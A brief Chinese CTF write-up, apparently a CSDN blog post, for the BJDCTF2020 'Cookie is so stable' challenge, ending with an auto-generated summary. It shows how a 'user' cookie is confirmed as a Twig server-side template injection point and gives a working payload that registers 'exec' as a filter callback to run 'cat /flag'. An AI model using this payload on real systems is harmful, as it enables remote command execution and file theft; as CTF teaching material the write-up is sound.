打开题目,发现了一个表单
在hint.php的页面源代码中发现一行注释,根据提示,cookie可能可以被我们利用
抓包后发现cookie中存在一个user,输入{{4*4}},页面直接返回了结果,说明这里存在SSTI模板注入
经过测试,这里可能为twing模板,使用payload进行命令执行
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
[BJDCTF2020]Cookie is so stable
最新推荐文章于 2024-06-13 07:36:50 发布
博客探讨了在PHP页面中发现的潜在安全漏洞,通过cookie中的user变量存在SSTI(Server-Side Template Injection)漏洞。文章指出可能存在Twing模板引擎,并利用payload尝试命令执行。该安全问题可能导致敏感信息泄露或服务器被控制。
摘要由CSDN通过智能技术生成